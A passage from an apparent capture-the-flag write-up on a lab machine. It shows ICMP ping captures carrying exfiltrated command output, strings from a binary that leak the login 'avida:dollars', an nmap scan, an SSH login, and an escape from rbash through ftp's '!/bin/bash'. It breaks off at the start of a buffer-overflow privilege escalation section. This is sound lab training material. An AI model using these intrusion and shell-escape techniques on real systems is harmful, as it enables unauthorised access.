</span><span class='line'>19:19:17.228837 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 43272, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a9 0000 4001 54dc ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 9c37 a908 0001 9f5b 2854  .......7.....[(T
</span><span class='line'>  0x0020:  427b 0e00 6874 6d6c 0a70 6572 6874 6d6c  B{..html.perhtml
</span><span class='line'>  0x0030:  0a70 6572 6874 6d6c 0a70 6572 6874 6d6c  .perhtml.perhtml
</span><span class='line'>  0x0040:  0a70 6572 6874 6d6c 0a70 6572 6874 6d6c  .perhtml.perhtml
</span><span class='line'>  0x0050:  0a70 6572                                .per
</span><span class='line'>19:19:17.229654 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 43528, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 c365 aa08 0001 9f5b 2854  .......e.....[(T
</span><span class='line'>  0x0020:  527e 0e00 7374 656e 7369 7374 656e 7369  R~..stensistensi
</span><span class='line'>  0x0030:  7374 656e 7369 7374 656e 7369 7374 656e  stensistensisten
</span><span class='line'>  0x0040:  7369 7374 656e 7369 7374 656e 7369 7374  sistensistensist
</span><span class='line'>  0x0050:  656e 7369                                ensi
</span><span class='line'>19:19:17.229664 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 43528, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0aa 0000 4001 54db ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 cb65 aa08 0001 9f5b 2854  .......e.....[(T
</span><span class='line'>  0x0020:  527e 0e00 7374 656e 7369 7374 656e 7369  R~..stensistensi
</span><span class='line'>  0x0030:  7374 656e 7369 7374 656e 7369 7374 656e  stensistensisten
</span><span class='line'>  0x0040:  7369 7374 656e 7369 7374 656e 7369 7374  sistensistensist
</span><span class='line'>  0x0050:  656e 7369                                ensi
</span><span class='line'>19:19:17.230462 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 43784, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 412b ab08 0001 9f5b 2854  ......A+.....[(T
</span><span class='line'>  0x0020:  ae81 0e00 6365 5f6f 665f 6d65 6365 5f6f  ....ce_of_mece_o
</span><span class='line'>  0x0030:  665f 6d65 6365 5f6f 665f 6d65 6365 5f6f  f_mece_of_mece_o
</span><span class='line'>  0x0040:  665f 6d65 6365 5f6f 665f 6d65 6365 5f6f  f_mece_of_mece_o
</span><span class='line'>  0x0050:  665f 6d65                                f_me
</span><span class='line'>19:19:17.230470 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 43784, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0ab 0000 4001 54da ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 492b ab08 0001 9f5b 2854  ......I+.....[(T
</span><span class='line'>  0x0020:  ae81 0e00 6365 5f6f 665f 6d65 6365 5f6f  ....ce_of_mece_o
</span><span class='line'>  0x0030:  665f 6d65 6365 5f6f 665f 6d65 6365 5f6f  f_mece_of_mece_o
</span><span class='line'>  0x0040:  665f 6d65 6365 5f6f 665f 6d65 6365 5f6f  f_mece_of_mece_o
</span><span class='line'>  0x0050:  665f 6d65                                f_me
</span><span class='line'>19:19:17.231224 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 44040, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 6bc1 ac08 0001 9f5b 2854  ......k......[(T
</span><span class='line'>  0x0020:  b684 0e00 6d6f 7279 5f62 795f 6d6f 7279  ....mory_by_mory
</span><span class='line'>  0x0030:  5f62 795f 6d6f 7279 5f62 795f 6d6f 7279  _by_mory_by_mory
</span><span class='line'>  0x0040:  5f62 795f 6d6f 7279 5f62 795f 6d6f 7279  _by_mory_by_mory
</span><span class='line'>  0x0050:  5f62 795f                                _by_
</span><span class='line'>19:19:17.231232 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 44040, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0ac 0000 4001 54d9 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 73c1 ac08 0001 9f5b 2854  ......s......[(T
</span><span class='line'>  0x0020:  b684 0e00 6d6f 7279 5f62 795f 6d6f 7279  ....mory_by_mory
</span><span class='line'>  0x0030:  5f62 795f 6d6f 7279 5f62 795f 6d6f 7279  _by_mory_by_mory
</span><span class='line'>  0x0040:  5f62 795f 6d6f 7279 5f62 795f 6d6f 7279  _by_mory_by_mory
</span><span class='line'>  0x0050:  5f62 795f                                _by_
</span><span class='line'>19:19:17.231999 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 44296, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 8dfc ad08 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  c487 0e00 7465 7370 6172 672d 7465 7370  ....tesparg-tesp
</span><span class='line'>  0x0030:  6172 672d 7465 7370 6172 672d 7465 7370  arg-tesparg-tesp
</span><span class='line'>  0x0040:  6172 672d 7465 7370 6172 672d 7465 7370  arg-tesparg-tesp
</span><span class='line'>  0x0050:  6172 672d                                arg-
</span><span class='line'>19:19:17.232008 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 44296, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0ad 0000 4001 54d8 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 95fc ad08 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  c487 0e00 7465 7370 6172 672d 7465 7370  ....tesparg-tesp
</span><span class='line'>  0x0030:  6172 672d 7465 7370 6172 672d 7465 7370  arg-tesparg-tesp
</span><span class='line'>  0x0040:  6172 672d 7465 7370 6172 672d 7465 7370  arg-tesparg-tesp
</span><span class='line'>  0x0050:  6172 672d                                arg-
</span><span class='line'>19:19:17.232682 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 44552, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 e0fb ae08 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  648a 0e00 716f 3034 6434 716f 3034 6434  d...qo04d4qo04d4
</span><span class='line'>  0x0030:  716f 3034 6434 716f 3034 6434 716f 3034  qo04d4qo04d4qo04
</span><span class='line'>  0x0040:  6434 716f 3034 6434 716f 3034 6434 716f  d4qo04d4qo04d4qo
</span><span class='line'>  0x0050:  3034 6434                                04d4
</span><span class='line'>19:19:17.232690 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 44552, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0ae 0000 4001 54d7 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 e8fb ae08 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  648a 0e00 716f 3034 6434 716f 3034 6434  d...qo04d4qo04d4
</span><span class='line'>  0x0030:  716f 3034 6434 716f 3034 6434 716f 3034  qo04d4qo04d4qo04
</span><span class='line'>  0x0040:  6434 716f 3034 6434 716f 3034 6434 716f  d4qo04d4qo04d4qo
</span><span class='line'>  0x0050:  3034 6434                                04d4
</span><span class='line'>19:19:17.233416 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 44808, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 36ea af08 0001 9f5b 2854  ......6......[(T
</span><span class='line'>  0x0020:  4d8d 0e00 382e 6a70 670a 7379 382e 6a70  M...8.jpg.sy8.jp
</span><span class='line'>  0x0030:  670a 7379 382e 6a70 670a 7379 382e 6a70  g.sy8.jpg.sy8.jp
</span><span class='line'>  0x0040:  670a 7379 382e 6a70 670a 7379 382e 6a70  g.sy8.jpg.sy8.jp
</span><span class='line'>  0x0050:  670a 7379                                g.sy
</span><span class='line'>19:19:17.233429 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 44808, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0af 0000 4001 54d6 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 3eea af08 0001 9f5b 2854  ......&gt;......[(T
</span><span class='line'>  0x0020:  4d8d 0e00 382e 6a70 670a 7379 382e 6a70  M...8.jpg.sy8.jp
</span><span class='line'>  0x0030:  670a 7379 382e 6a70 670a 7379 382e 6a70  g.sy8.jpg.sy8.jp
</span><span class='line'>  0x0040:  670a 7379 382e 6a70 670a 7379 382e 6a70  g.sy8.jpg.sy8.jp
</span><span class='line'>  0x0050:  670a 7379                                g.sy
</span><span class='line'>19:19:17.234099 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 45064, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 e88d b008 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  f18f 0e00 7361 646d 696e 2d74 7361 646d  ....sadmin-tsadm
</span><span class='line'>  0x0030:  696e 2d74 7361 646d 696e 2d74 7361 646d  in-tsadmin-tsadm
</span><span class='line'>  0x0040:  696e 2d74 7361 646d 696e 2d74 7361 646d  in-tsadmin-tsadm
</span><span class='line'>  0x0050:  696e 2d74                                in-t
</span><span class='line'>19:19:17.234108 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 45064, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0b0 0000 4001 54d5 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 f08d b008 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  f18f 0e00 7361 646d 696e 2d74 7361 646d  ....sadmin-tsadm
</span><span class='line'>  0x0030:  696e 2d74 7361 646d 696e 2d74 7361 646d  in-tsadmin-tsadm
</span><span class='line'>  0x0040:  696e 2d74 7361 646d 696e 2d74 7361 646d  in-tsadmin-tsadm
</span><span class='line'>  0x0050:  696e 2d74                                in-t
</span><span class='line'>19:19:17.234794 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 45320, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 78fd b108 0001 9f5b 2854  ......x......[(T
</span><span class='line'>  0x0020:  ae92 0e00 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ....ool.ool.ool.
</span><span class='line'>  0x0030:  6f6f 6c0a 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ool.ool.ool.ool.
</span><span class='line'>  0x0040:  6f6f 6c0a 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ool.ool.ool.ool.
</span><span class='line'>  0x0050:  6f6f 6c0a                                ool.
</span><span class='line'>19:19:17.234802 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 45320, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0b1 0000 4001 54d4 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 80fd b108 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  ae92 0e00 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ....ool.ool.ool.
</span><span class='line'>  0x0030:  6f6f 6c0a 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ool.ool.ool.ool.
</span><span class='line'>  0x0040:  6f6f 6c0a 6f6f 6c0a 6f6f 6c0a 6f6f 6c0a  ool.ool.ool.ool.
</span><span class='line'>  0x0050:  6f6f 6c0a                                ool.</span></code></pre></td></tr></table></div></figure>


<p>So we have 2 files, one is the JPG with Salvadore Dali&rsquo;s painting, the other one looks very interesting though: sysadmin-tool. Let&rsquo;s have a look what it is and download it via web browser: <a href="http://172.16.246.128/sysadmin-tool">http://172.16.246.128/sysadmin-tool</a></p>

<p>I don&rsquo;t like running unknown binaries, so let&rsquo;s have a look at strings:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data# strings sysadmin-tool 
</span><span class='line'>/lib/ld-linux.so.2
</span><span class='line'>__gmon_start__
</span><span class='line'>libc.so.6
</span><span class='line'>_IO_stdin_used
</span><span class='line'>chroot
</span><span class='line'>strncmp
</span><span class='line'>puts
</span><span class='line'>setreuid
</span><span class='line'>mkdir
</span><span class='line'>rmdir
</span><span class='line'>chdir
</span><span class='line'>system
</span><span class='line'>__libc_start_main
</span><span class='line'>GLIBC_2.0
</span><span class='line'>PTRh 
</span><span class='line'>[^_]
</span><span class='line'>Usage: sysadmin-tool --activate-service
</span><span class='line'>--activate-service
</span><span class='line'>breakout
</span><span class='line'>/bin/sed -i 's/^#//' /etc/sysconfig/iptables
</span><span class='line'>/sbin/iptables-restore &lt; /etc/sysconfig/iptables
</span><span class='line'>Service started...
</span><span class='line'>Use avida:dollars to access.
</span><span class='line'>/nginx/usr/share/nginx/html/breakout</span></code></pre></td></tr></table></div></figure>


<p>By the looks of it, it modifies iptables by uncommenting lines that were commented out - maybe finally TCP will be allowed! Also, avida:dollars is quite interesting, could be username:password combination for later - let&rsquo;s keep that in mind. Oh, also, seems that we have to run it with &ndash;activate-service parameter.</p>

<p>Cool, back to my script, modify $CMD variable remembering to include ./ before the binary name since we are running it from local directory ($CMD=&lsquo;./sysadmin-tool &ndash;activate-service&rsquo;) and hope for the best&hellip;</p>

<p>Alright, in our ping data we can see the output &ldquo;Service started Use avida:dollars to access&rdquo;. Awesome! Let&rsquo;s run nmap on again and see what&rsquo;s that new service.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV -A 172.16.246.128
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-28 19:33 EST
</span><span class='line'>Nmap scan report for 172.16.246.128
</span><span class='line'>Host is up (0.00046s latency).
</span><span class='line'>Not shown: 998 filtered ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
</span><span class='line'>| ssh-hostkey: 
</span><span class='line'>|   1024 f6:c7:fe:24:09:fa:dc:db:ea:7e:33:6a:f5:36:58:35 (DSA)
</span><span class='line'>|_  2048 37:22:da:ba:ef:05:1f:77:6a:30:6f:61:56:7b:47:54 (RSA)
</span><span class='line'>80/tcp open  http    nginx 1.4.7
</span><span class='line'>|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
</span><span class='line'>|_http-title: The Persistence of Memory - Salvador Dali
</span><span class='line'>MAC Address: 00:0C:29:3A:9E:BA (VMware)
</span><span class='line'>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
</span><span class='line'>Device type: general purpose
</span><span class='line'>Running: Linux 2.6.X|3.X
</span><span class='line'>OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
</span><span class='line'>OS details: Linux 2.6.32 - 3.10
</span><span class='line'>Network Distance: 1 hop
</span><span class='line'>
</span><span class='line'>TRACEROUTE
</span><span class='line'>HOP RTT     ADDRESS
</span><span class='line'>1   0.47 ms 172.16.246.128
</span><span class='line'>
</span><span class='line'>OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds</span></code></pre></td></tr></table></div></figure>


<p>Woohoo! Port 22 is open and listening! And guess what, avida:dollars is probably username:password combination that we could use to log-in.</p>

<h2>Escaping from a restricted shell</h2>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ssh avida@172.16.246.128
</span><span class='line'>The authenticity of host '172.16.246.128 (172.16.246.128)' can't be established.
</span><span class='line'>RSA key fingerprint is 37:22:da:ba:ef:05:1f:77:6a:30:6f:61:56:7b:47:54.
</span><span class='line'>Are you sure you want to continue connecting (yes/no)? yes
</span><span class='line'>Warning: Permanently added '172.16.246.128' (RSA) to the list of known hosts.
</span><span class='line'>avida@172.16.246.128's password: 
</span><span class='line'>Last login: Mon Mar 17 17:13:40 2014 from 10.0.0.210
</span><span class='line'>-rbash-4.1$ </span></code></pre></td></tr></table></div></figure>


<p>And we have access! But what the hell is that - rbash? Restricted shell? Arrrrgh! Let&rsquo;s try to escape from it.</p>

<p>First, recon - poke around and see what we can do and what we can&rsquo;t.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>-rbash-4.1$ ls
</span><span class='line'>usr
</span><span class='line'>-rbash-4.1$ ls usr
</span><span class='line'>bin
</span><span class='line'>-rbash-4.1$ ls usr/bin/
</span><span class='line'>cat    df    ftp     ifconfig  ls      netstat  pstree  rmdir   top     which
</span><span class='line'>clear  diff  grep    iftop     lscpu   nice     pwd     route   touch   who
</span><span class='line'>cp     dir   gunzip  ipcalc    md5sum  passwd   rename  seq     uniq    whoami
</span><span class='line'>cut    du    gzip    kill      mkdir   ping     renice  sort    uptime
</span><span class='line'>dd     file  id      locale    nano    ps       rm      telnet  wc
</span><span class='line'>-rbash-4.1$ export -p
</span><span class='line'>declare -x G_BROKEN_FILENAMES="1"
</span><span class='line'>declare -x HISTCONTROL="ignoredups"
</span><span class='line'>declare -x HISTSIZE="1000"
</span><span class='line'>declare -x HOME="/home/avida"
</span><span class='line'>declare -x HOSTNAME="persistence"
</span><span class='line'>declare -x LANG="en_AU.UTF-8"
</span><span class='line'>declare -x LESSOPEN="|/usr/bin/lesspipe.sh %s"
</span><span class='line'>declare -x LOGNAME="avida"
</span><span class='line'>declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;05;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.tbz=01;31:*.tbz2=01;31:*.bz=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.axa=01;36:*.oga=01;36:*.spx=01;36:*.xspf=01;36:"
</span><span class='line'>declare -x MAIL="/var/spool/mail/avida"
</span><span class='line'>declare -x OLDPWD
</span><span class='line'>declare -rx PATH="/home/avida/usr/bin"
</span><span class='line'>declare -x PWD="/home/avida"
</span><span class='line'>declare -x SELINUX_LEVEL_REQUESTED=""
</span><span class='line'>declare -x SELINUX_ROLE_REQUESTED=""
</span><span class='line'>declare -x SELINUX_USE_CURRENT_RANGE=""
</span><span class='line'>declare -rx SHELL="/bin/rbash"
</span><span class='line'>declare -x SHLVL="1"
</span><span class='line'>declare -x SSH_CLIENT="172.16.246.129 60435 22"
</span><span class='line'>declare -x SSH_CONNECTION="172.16.246.129 60435 172.16.246.128 22"
</span><span class='line'>declare -x SSH_TTY="/dev/pts/0"
</span><span class='line'>declare -x TERM="xterm"
</span><span class='line'>declare -x USER="avida"</span></code></pre></td></tr></table></div></figure>


<p>So, there are number of commands we can run, all interesting environment variables seem to be read only - we can&rsquo;t change PATH or SHELL, I also tried connecting via SSH and running arbitrary commands, but that didn&rsquo;t work either.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ssh avida@172.16.246.128 '/bin/bash'
</span><span class='line'>avida@172.16.246.128's password: 
</span><span class='line'>rbash: /bin/bash: restricted: cannot specify `/' in command names</span></code></pre></td></tr></table></div></figure>


<p>Played around with some basic stuff to see what we can do and what not, but apart from creating empty files in /tmp, we can&rsquo;t do much more - can&rsquo;t redirect output, can&rsquo;t include / in command names, quite a lot of restrictions. Also .bash_history .bashrc and .profile files had nothing of interest.</p>

<p>Let&rsquo;s have a look at what commands we can run (anything in /home/avida/usr/bin) and do they offer any shell escape commands.</p>

<p>First 2 that stand out are telnet and ftp. They both have capabilities of spawning a shell - let&rsquo;s try telnet:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>-rbash-4.1$ telnet
</span><span class='line'>telnet&gt; !/bin/bash
</span><span class='line'>rbash: /bin/bash: restricted: cannot specify `/' in command names</span></code></pre></td></tr></table></div></figure>


<p>Doesn&rsquo;t work - it tried to invoke a subshell utilising the current shell. How about <a href="ftp:">ftp:</a></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>-rbash-4.1$ ftp
</span><span class='line'>ftp&gt; !/bin/bash
</span><span class='line'>bash-4.1$ </span></code></pre></td></tr></table></div></figure>


<p>Haaaaaaaaa! We have unrestricted shell! So now we just need to find privilege escalation point and we&rsquo;re done - we should be really close&hellip; but that&rsquo;s where the fun just begins.</p>

<h2>Privilege escalation via buffer overflow vulnerability</h2>

<p>First of all, let&rsquo;s update PATH to include standard locations of the binaries (we&rsquo;re still having the same PATH variable as in the restricted shell). I also like to set up some aliases:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ PATH=/bin:/usr/bin:/usr/local/bin
</span><span class='line'>bash-4.1$ alias ls='ls -al --color'
</span><span class='line'>bash-4.1$ alias l='ls'</span></code></pre></td></tr></table></div></figure>


<p>Cool, let&rsquo;s see what do we have here that we could utilise. First thing&rsquo;s first - sudo!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ sudo -l
</span><span class='line'>[sudo] password for avida: 
</span><span class='line'>Sorry, user avida may not run sudo on persistence.</span></code></pre></td></tr></table></div></figure>


<p>Ah, that sucks. Keep poking around, is there anything interesting running&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
